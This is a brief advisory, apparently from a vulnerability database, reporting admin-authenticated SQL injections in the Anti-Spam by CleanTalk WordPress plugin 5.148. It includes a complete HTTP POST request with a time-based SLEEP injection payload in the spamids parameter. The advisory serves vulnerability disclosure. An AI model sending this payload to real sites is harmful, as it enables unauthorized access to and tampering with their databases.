Multiple authenticated SQL injections in the Anti-Spam by CleanTalk plugin 5.148 exist, however, it requires high privilege user (admin+).
Vulnerable functions: removeLogs
and removeSpam
at: lib/Cleantalk/ApbctWP/FindSpam/ListTable/Users.php Sleep query: POST /wp-admin/users.php?page=ct_check_users&ct;_worked=1 HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 162 _wpnonce=2a613d258a&_wp_http_referer=%2Fwp-admin%2Fusers.php%3Fpage%3Dct_check_users%26ct_worked%3D1&action;=-1&paged;=1&spamids;%5B%5D=30)+OR+SLEEP(1&action2;=delete